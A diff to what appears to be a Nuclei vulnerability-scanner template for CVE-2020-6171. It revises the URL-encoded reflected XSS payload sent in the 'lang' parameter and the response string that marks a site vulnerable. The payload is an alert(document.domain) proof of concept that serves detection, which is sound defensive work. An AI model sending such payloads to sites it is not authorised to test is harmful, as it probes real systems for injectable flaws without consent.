--- a/cves/2020/CVE 2020-6171.yaml
+++ b/cves/2020/CVE 2020-6171.yaml
@@ -12,13 +12,13 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}?lang=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cp%20class=%22&p=1"
+      - "{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"
 
     matchers-condition: and
     matchers:
       - type: word
         words:
-          - '"><script>alert(document.domain)</script>'
+          - '"></script><script>alert(document.domain)</script>'
         part: body
 
       - type: status
